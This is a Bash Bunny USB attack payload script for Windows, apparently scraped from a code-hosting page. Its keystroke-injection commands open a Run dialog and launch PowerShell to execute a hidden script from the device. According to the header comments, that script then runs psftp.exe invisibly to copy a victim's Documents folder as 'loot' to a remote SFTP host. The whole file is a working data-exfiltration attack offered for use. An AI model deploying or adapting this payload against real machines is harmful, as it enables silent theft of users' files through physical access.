36 lines
1.3 KiB
Bash
36 lines
1.3 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: ExecutableInstaller with sftp recursive directory grab for Bash Bunnys
|
|
# Author: IMcPwn
|
|
# Revision for SFTP: Mule Skinner
|
|
# Version: 1.0
|
|
# Target: Windows 7+
|
|
# NOTICE: HAK5 is not responsible for the execution of 3rd party binaries!
|
|
#
|
|
# Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd.
|
|
# e.cmd is excuted invisibly using i.vbs
|
|
# which in turn copies psftp.exe from the root of the Bash Bunny and then executes it
|
|
# Change these settings inside of e.cmd
|
|
# sftphost=username@hostname.domain.com
|
|
# sftppass=password
|
|
# SET lootfrom=c:\users\username\documents
|
|
# SET looto=/loot
|
|
#
|
|
#IMPORTANT:
|
|
#To Download psftp.exe please use one of the links below:
|
|
#32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe
|
|
#64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe
|
|
#Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload.
|
|
#
|
|
|
|
LED SETUP
|
|
GET SWITCH_POSITION
|
|
ATTACKMODE HID STORAGE
|
|
QUACK GUI r
|
|
QUACK DELAY 100
|
|
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
|
|
QUACK ENTER
|
|
|
|
# Green LED for finished
|
|
LED FINISH
|